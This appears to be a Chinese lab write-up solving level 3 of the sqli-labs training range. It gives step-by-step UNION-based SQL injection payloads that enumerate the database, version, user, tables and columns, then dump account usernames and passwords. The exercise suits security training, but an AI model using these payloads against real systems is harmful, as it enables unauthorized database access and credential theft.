SQL注入sqli_labs靶场第三题

?id=1'and 1=1 and '1'='1和?id=1'and 1=1 and '1'='1进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为字符型注入。

根据报错信息判断为单引号带括号注入

联合查询:

猜解列名

?id=1') order by 3--+

判断回显点

?id=-1') union select 1,2,3--+

爆库、版本号、权限

?id=-1') union select 1,database(),version()--+
?id=-1') union select 1,2,user()--+

爆表、爆列

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

爆账号密码

?id=-1') union select 1,2,(select group_concat(username,password))from users

相关推荐
懒虫虫~15 小时前
通过内存去重替换SQL中distinct,优化SQL查询效率
java·sql·慢sql治理
逛逛GitHub16 小时前
1 个神级智能问数工具,刚开源就 1500 Star 了。
sql·github
Huhbbjs17 小时前
SQL 核心概念与实践总结
开发语言·数据库·sql
咋吃都不胖lyh17 小时前
SQL-字符串函数、数值函数、日期函数
sql
sensenlin9117 小时前
Mybatis中SQL全大写或全小写影响执行性能吗
数据库·sql·mybatis
会飞的架狗师17 小时前
【MySQL体系】第1篇:从MySQL架构原理到存储的解析
后端·mysql
BXCQ_xuan18 小时前
软件工程实践四:MyBatis-Plus 教程(连接、分页、查询)
spring boot·mysql·json·mybatis
玉衡子19 小时前
七、InnoDB底层原理与日志机制
java·mysql
cyforkk19 小时前
MySQL 唯一约束:从基础到实战,解决数据重复的核心工具
数据库·mysql
快乐肚皮20 小时前
SQL调优全攻略:从原理到实战
mysql